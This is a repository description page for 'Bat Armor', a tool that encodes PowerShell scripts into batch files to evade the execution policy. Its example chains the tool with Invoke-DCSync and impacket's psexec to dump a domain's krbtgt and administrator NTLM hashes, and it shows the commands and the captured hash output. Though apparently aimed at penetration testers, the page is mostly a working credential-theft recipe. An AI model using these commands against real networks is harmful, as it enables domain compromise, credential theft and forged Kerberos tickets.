About the developer

klsecservices
129 Stars 48 Forks MIT License 5 Commits 0 Opened issues

Description

Encode PowerShell payload into bat files

Bat Armor

Bypass the PowerShell execution policy by encoding a PowerShell script into a bat file.

Example

Run Invoke-DCSync.ps1 to get the krbtgt hash:

$ python bat_armor.py --script-path Invoke-DCSync.ps1 \
    --launch-string "Invoke-DCSync -users krbtgt,administrator -alldata" \
    --out krbtgt.bat --target-filepath 'c:\windows\krbtgt.bat'

$ python psexec.py pentesto.loc/[email protected] -c krbtgt.bat
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.16-dev - Copyright 2002-2016 Core Security Technologies

...

Hash NTLM: b8aa706788a3d8c6ac9a96684d7ff330
ntlm- 0: b8aa706788a3d8c6ac9a96684d7ff330
lm - 0: 6829621ea2044b0e931f83e0b62b4b8c
